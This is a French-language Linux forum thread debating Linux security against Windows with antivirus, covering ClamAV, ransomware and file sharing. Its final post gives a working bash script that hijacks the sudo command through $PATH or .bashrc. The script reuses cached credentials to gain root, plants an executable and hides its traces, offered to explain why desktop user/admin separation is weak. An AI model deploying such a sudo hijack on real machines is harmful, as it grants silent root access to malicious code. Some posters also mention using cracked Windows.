Bonsoir,
Je sais bien qu'il n'y a pas de système infaillible et que tout dépend de l'utilisateur mais que vaut la sécurité de Linux comparé à un Windows équipé d'un antivirus du type Kaspersky ou BitDefender ?
Linux a lui tout seul peut il prévenir d'une application suspecte, tentative de phishing, virus etc ?
Que valent ClamAv et Sophos ?
Merci
Bonjour.
Vaste discussion et impossible de répondre en quelques mots.
La plupart des attaques concerne W$ qui est l'OS le plus répandu. Sa philosophie <user friendly> permet des modifications système sans le consentement de l'utilisateur, ce qui est contraire à la philosophie Linux et a plus fortes raisons à la philo <KISS>.
Les virus et autres micro logiciels vérolés sont du coup pour la plupart inoffensifs chez nous, mais nous pouvons être "porteurs sains" et donc transmettre ces Windovirus.
Mais nous ne sommes pas absolument à l'abri pour autant et la part de Linux sur les serveurs devient très importante ce qui peut attiser la convoitise des éditeurs d'anti-virus....
Noyau récent MANJARO x86_64 bits: 64 Xfce 4.16
ASUSTeK model: PRIME B350M-A v: Rev X.0x
6-Core: AMD Ryzen 5 2600X
AMD Baffin [Radeon RX 460/560D / Pro
driver: amdgpu v: kernel
Display: x11 server: X.Org driver: amdgpu,ati unloaded: modesetting
OpenGL: renderer: Radeon RX 560 Series
Arch en Dual. Aucun lien publicitaire ne saurait être toléré dans la signature!
Oscar a écrit : ↑il y a 3 ans
Bonsoir,
Je sais bien qu'il n'y a pas de système infaillible et que tout dépend de l'utilisateur mais que vaut la sécurité de Linux comparé à un Windows équipé d'un antivirus du type Kaspersky ou BitDefender ?
Linux a lui tout seul peut il prévenir d'une application suspecte, tentative de phishing, virus etc ?
Que valent ClamAv et Sophos ?
Merci
Ton préambule est bon : tout système peut avoir une fragilité et l'utilisateur est le point faible.
Malgré tout, il faut être pomme pour comparer un truc que tu as payé (W$) et pour lequel tu as du payer une protection (Kamachin, Bittruc, Avbidule, Norchose) à un truc qui différencie utilisateur et administrateur.
Pour le premier, tu payes un mec qui ne te protège pas, donc tu en payes un second, lequel te dit "fais moi confiance". Celui-là ne gagne sa vie que si tu as des emmerdes... Conclus toi-même...
Dans les emmerdes que tu signales, le phishing suppose la participation active de l'utilisateur, là, le souci n'est pas w$ ou Linux, mais Marcel...
Clamav permet aux linuxiens de se donner bonne conscience en regardant si ils n'ont pas de vérole W$ (mais en fait ils devraient s'en fiche.)
Sophos, c'est comme les autres : un truc payant que son utilisateur super croit car il l'a payé et qu'il refuse de se penser couillon...
Sinon, il y a beaucoup, beaucoup, beaucoup plus de trucs qui tournent sous Linux ou dérivés que sous W$ en ce bas monde...
Xubuntu devel - Manjaro unstable - OpenSUSE tumbleweed (GeckoLinux) -Debian Testing
Trucs, astuces, tutos et analyses de l'open source dans l'almanet doLys
Ok merci pour vos réponses rapides, donc pas nécessaire d'installer un antivirus.
Parfois je me demande si les éditeurs d'anti-virus créent des virus pour forcer les utilisateurs à payer un abonnement, suis-je parano ?
un truc que tu as payé (W$) et pour lequel tu as du payer une protection
Mes amis ont quasi tous un Windows cracké et une licence anti-virus d'un an sur plusieurs postes ca ne coûte pas cher, je suis sur que des Linuxiens dépensent plus en clopes sur une semaine
En farfouillant j'ai trouvé des articles sur Qubes OS, un os très orienté sécurité, quelqu'un a déjà essayé ?
Oscar a écrit : ↑il y a 3 ans
(...)
Mes amis ont quasi tous un Windows cracké et une licence anti-virus d'un an sur plusieurs postes ca ne coûte pas cher, je suis sur que des Linuxiens dépensent plus en clopes sur une semaine
En farfouillant j'ai trouvé des articles sur Qubes OS, un os très orienté sécurité, quelqu'un a déjà essayé ?
Pour le fun : avant d'arriver sous Linux, j'avais soit des W$ crackés, soit des W$ en version beta (donc gratos).
...et un antivirus que je payais.
C'est lors de la résolution d'un faux positif de mon antivirus (AVG à l'époque) que le type de la helpdesk m'avait dit : "chez moi je n'ai pas d'anti virus : je suis sous Linux" !!!
La semaine suivante j'achetais un magazine avec un cd Ubuntu Studio, je n'ai plus jamais redémarré un W$ depuis.
QubesOs est un exercice de style, apprends déjà les bases et la distinction administrateur/utilisateur avec ta Manjaro : dans un mois tu en sauras plus sur ton ordi que depuis toute ton expérience chez M$
Xubuntu devel - Manjaro unstable - OpenSUSE tumbleweed (GeckoLinux) -Debian Testing
Trucs, astuces, tutos et analyses de l'open source dans l'almanet doLys
nam1962 a écrit : ↑il y a 3 ans
Clamav permet aux linuxiens de se donner bonne conscience en regardant si ils n'ont pas de vérole W$ (mais en fait ils devraient s'en fiche.)
Sophos, c'est comme les autres : un truc payant que son utilisateur super croit car il l'a payé et qu'il refuse de se penser couillon...
Tu ne t'en fiches pas si tu dois partager des fichiers avec des windowsiens. On avait encore accès à des antivirus gratuits plus performants que Clamav, mais ça sent la fin, Bitdefender c'est fini depuis un moment, la version Home gratuite de Sophos depuis l'année dernière, F-prot arrête fin Juillet.
Portable: Manjaro 64 KDE 5 Kernel: 4.13.12-1 Asus R510J (X550JK rebadgé vendu sans OS), Core I5-4200H, GeForce GTX 850M, 8 Go DDR3, HD 1 To, 15'5 full HD.
Par choix, pas d'UEFI, pas de swap. 3 partitions primaires: /, /home, /home/stock.
Bonjour,
Pourquoi, Avast n'existe plus ?
C'est celui que j'utilise lorsque je me sers de W$ avec VirtualBox sans problème jusque là !
Et j'utilise le "Free"
Manjaro 22.1.0 Talos ~ Xfce4-Stable ~ Linux 6.2.9-1 ~ Intel Core i7 ~ 16 Go RAM ~ Intel Xeon E3-1200 v3/4th ~ Ssd 250 Go + Ssd 120 Go~Realtek ALC892
Tu ne t'en fiches pas si tu dois partager des fichiers avec des windowsiens
Donc en cas d'un dualboot Win10/Manjaro, un disque pour chaque os et mes dossiers persos sur d'autres disques, ai-je intérêt à installer un antivirus ?
J'insiste encore sur Clam: Pamac propose un ClamTK et les avis diverges, scan particulièrement long mais efficace..
Mais surtout, à l'analyse des disques, Est-ce que Clam risque de supprimer le crack de mon Win ?
(Je l'ai toujours en réserve sur une clé au cas où, ainsi qu'une image du système donc pas trop de crainte mais c'est chiant à réinstaller..)
Merci
Smurf a écrit : ↑il y a 3 ans
(...)
Tu ne t'en fiches pas si tu dois partager des fichiers avec des windowsiens.(...)
Euhhh.. Explique moi bien...
En quoi devrais-tu te préoccuper des défaillances du choix du récepteur ? (Que tu ne connais même pas)
Si il a choisi un truc naze, il protège son truc naze et moi je n'ai rien à y faire....
Xubuntu devel - Manjaro unstable - OpenSUSE tumbleweed (GeckoLinux) -Debian Testing
Trucs, astuces, tutos et analyses de l'open source dans l'almanet doLys
Smurf a écrit : ↑il y a 3 ans
(...)
Tu ne t'en fiches pas si tu dois partager des fichiers avec des windowsiens.(...)
Euhhh.. Explique moi bien...
En quoi devrais-tu te préoccuper des défaillances du choix du récepteur ? (Que tu ne connais même pas)
Si il a choisi un truc naze, il protège son truc naze et moi je n'ai rien à y faire....
Je pense qu'il fait mention que le partage de fichiers direct implique le partage de virus. Quand tu remets la responsabilité à tes destinataires, ce raisonnement veut que si tu vas au bout des choses tu as fait une analyse de tes fichiers à partager avant que ton récepteur l'ait fait. Ça me rappelle que quand je transmettais des fichiers à une personne en particulier, elle ne voulait que par courrier électronique car par USB ou P2P, elle n'avait pas ce que son service de mail faisait : une analyse antivirus.
Pour répondre à la question initiale, que vous soyez sous w$ ou sur Linux, vous ne casserez pas votre système avec un virus si celui-ci n'a pas les accès administrateur. Au pire les fichiers utilisateurs seront corrompus. Les deux OS sont bêtes et disciplinés.
Pour W$, vous avez en plus un antivirus et deux ou trois services de base qui vont vous cloisonner votre utilisation, ainsi si vous dites "Oui je fais confiance à cet éditeur ou à cette source inconnue", w$ ne sera pas dans son domaine de responsabilité si vous pétez votre système. Tout comme quand vous désactivez le mode S de w$10. Les antivirus pour w$ vont encore plus cloisonner votre utilisation.
En ce qui concerne Linux, le cloisonnement reste difficile car en général, les utilisateurs de de GNU/Linux maîtrisent mieux et ont déjà mis les mains dans le cambouis
nam1962 a écrit : ↑il y a 3 ans
Euhhh.. Explique moi bien...
En quoi devrais-tu te préoccuper des défaillances du choix du récepteur ? (Que tu ne connais même pas)
Si il a choisi un truc naze, il protège son truc naze et moi je n'ai rien à y faire....
Je parle de partage en général, que ce soit en P2P avec des personnes que tu ne connais pas ou avec des proches sous Windows. Si tu peux prévenir qu'un fichier vérolé continue à se transmettre, je ne vois rien de négatif à cela. Ton attitude est assez étonnante, tant que tu n'es pas touché, tu t'en moques si je comprend bien.
monsieur Q a écrit : ↑il y a 3 ans
En ce qui concerne Linux, le cloisonnement reste difficile car en général, les utilisateurs de de GNU/Linux maîtrisent mieux et ont déjà mis les mains dans le cambouis
Je n'y crois pas trop, le niveau de connaissance du système Linux en général, est sans doute plus faible chez le linuxien moyen qu'il ne l'était auparavant, et à cela il faut ajouter les attaques ciblées pour Linux, les hackers créent des ransomwares pour Linux depuis deux-trois ans.
Smurf a écrit : ↑il y a 3 ans
(...)
Je parle de partage en général, que ce soit en P2P avec des personnes que tu ne connais pas ou avec des proches sous Windows. Si tu peux prévenir qu'un fichier vérolé continue à se transmettre, je ne vois rien de négatif à cela. Ton attitude est assez étonnante, tant que tu n'es pas touché, tu t'en moques si je comprends bien.
(...)
Je ne m'en moque pas, bien plus simplement je ne suis pas concerné (tant que je sais que MON système n'est pas vérolé, si je partage des trucs qui ME vérolent, ce n'est pas bien)
1. je ne connais pas les outils de mes correspondants, déjà, là, il est idiot de chercher à "les protéger"
2. je ne suis pas personnel gratos d'une solution commerciale : c'est à la solution et ses acheteurs de "se protéger" et de se démerder avec leur fournisseur défaillant ou avec leurs pratiques foireuses.
3. s’ils ont un doute ou un souci je leur colle une Debian ou une Manjaro (déjà fait des dizaines de fois, jamais eu une récrimination, jamais demandé leur avis
Les grandes morales à appliquer aux autres, ça va un temps...
Xubuntu devel - Manjaro unstable - OpenSUSE tumbleweed (GeckoLinux) -Debian Testing
Trucs, astuces, tutos et analyses de l'open source dans l'almanet doLys
Smurf a écrit : ↑il y a 3 ans
Je n'y crois pas trop, le niveau de connaissance du système Linux en général, est sans doute plus faible chez le linuxien moyen qu'il ne l'était auparavant, et à cela il faut ajouter les attaques ciblées pour Linux, les hackers créent des ransomwares pour Linux depuis deux-trois ans.
Certes mais comment un ransomware peut t'atteindre ? Tu l'exécutes ?
monsieur Q a écrit : ↑il y a 3 ans
(...)
Certes mais comment un ransomware peut t'atteindre ? Tu l'exécutes ?
Ben non : il faut le compiler d'abord, avec les dépendances de la distro/version/variante... Et comme le linuxien est devenu de plus en plus bête, comme t'a dit le monsieur, le hacker désespère...
Xubuntu devel - Manjaro unstable - OpenSUSE tumbleweed (GeckoLinux) -Debian Testing
Trucs, astuces, tutos et analyses de l'open source dans l'almanet doLys
nam1962 a écrit : ↑il y a 3 ans
Je ne m'en moque pas, bien plus simplement je ne suis pas concerné (tant que je sais que MON système n'est pas vérolé, si je partage des trucs qui ME vérolent, ce n'est pas bien) Non, tu ne te sens pas concerné, c'est différent, moi, c'est mon système Linux qui n'est pas concerné.
1. je ne connais pas les outils de mes correspondants, déjà, là, il est idiot de chercher à "les protéger" Il est idiot de croire que tu n'as aucune responsabilité dans les données que tu transmets.
2. je ne suis pas personnel gratos d'une solution commerciale : c'est à la solution et ses acheteurs de "se protéger" et de se démerder avec leur fournisseur défaillant ou avec leurs pratiques foireuses.
3. s’ils ont un doute ou un souci je leur colle une Debian ou une Manjaro (déjà fait des dizaines de fois, jamais eu une récrimination, jamais demandé leur avis C'est aux acheteurs de se démerder, mais tu leur installes Linux "gratuitement" sans leur demander leur avis.
Quand je faisais des installs Linux, c'était après avoir discuté avec les personnes.
Les grandes morales à appliquer aux autres, ça va un temps...
C'est une question de bon sens ou de savoir vivre, pas de morale, et tu peux donner ton avis sans affirmations péremptoires.
monsieur Q a écrit : ↑il y a 3 ans
Certes mais comment un ransomware peut t'atteindre ? Tu l'exécutes ?
Par mail ou par une attaque réseau, de ce que j'avais lu, c'est d'abord un petit exécutable qui va se planquer dans un répertoire défini et qui va ensuite télécharger le ransomware.
nam1962 a écrit : ↑il y a 3 ans
Ben non : il faut le compiler d'abord, avec les dépendances de la distro/version/variante... Et comme le linuxien est devenu de plus en plus bête, comme t'a dit le monsieur, le hacker désespère...
Un binaire en C ou autre langage commun n'a pas de problème à s'exécuter sur n'importe quelle distro. Tu devrais cesser d'interpréter ce que je dis, tes raccourcis à la con ne font pas avancer la discussion.
Smurf a écrit : ↑il y a 3 ans
Par mail ou par une attaque réseau, de ce que j'avais lu, c'est d'abord un petit exécutable qui va se planquer dans un répertoire défini et qui va ensuite télécharger le ransomware.
La transmission de la donnée à savoir le fichier ransomware, je l'avais déjà conceptualisée. Mais ce n'est pas parce que j'ai DL un tel fichier qu'il va s’exécuter de lui même. Que je sache, un ransomware, c'est un programme. Programme qui sera exécuté, donc c'est bien de la responsabilité de l'utilisateur.
Ou alors j'ai faux sur toute la ligne ?
mais si on télécharge un fichier, généralement c'est pour l'ouvrir... donc il est "facile" de se faire avoir
-----
la séparation user/admin ... bof sur les linux desktop
j'avais déjà donné un exemple simple ici, revoici
Si on execute une vérole en user, c'est assez simple d'obtenir un droit root sur nos postes Il suffit par exemple de "surcharger" notre commande sudo (yay aussi par exemple) !
exemple: le méchant
- écrit une fonction sudo dans notre .bashrc ou
- va ajouter un chemin dans notre $PATH pour que sudo soit lancé depuis notre home
Exemple d'un méchant sudo avec un simple script bash (par exemple: ~/bin/sudo):
ps: ici, le méchant ne casse rien il va juste créer un fichier vide à la racine de notre système
#!/usr/bin/env bash
# on passe en admin
/usr/bin/sudo sh -c "echo ''>/dev/null"
# suis en root, j'ai tous les droits pour casser ou insérer virus
# ici le mot de passe n'est plus demandé !
/usr/bin/sudo touch /virus.exe
/usr/bin/sudo chmod +x /virus.exe
# ls -l /*.exe # pour contrôler, pas à faire pour pirate
# execute la commande demandée par user pour qu'il ne vois rien...
/usr/bin/sudo $@
# maintenant le vilain peut effacer ces traces
#rm ~/bin/sudo
Si ce code est une function dans notre .bashrc ou dans un fichier dans notre $PATH il sera exécuté à la place de la bonne commande (modif faite par le virus téléchargé/exécuté dans $HOME)
Maintenant un sudo pacman -Syu va apparemment bien s'exécuter... mais ...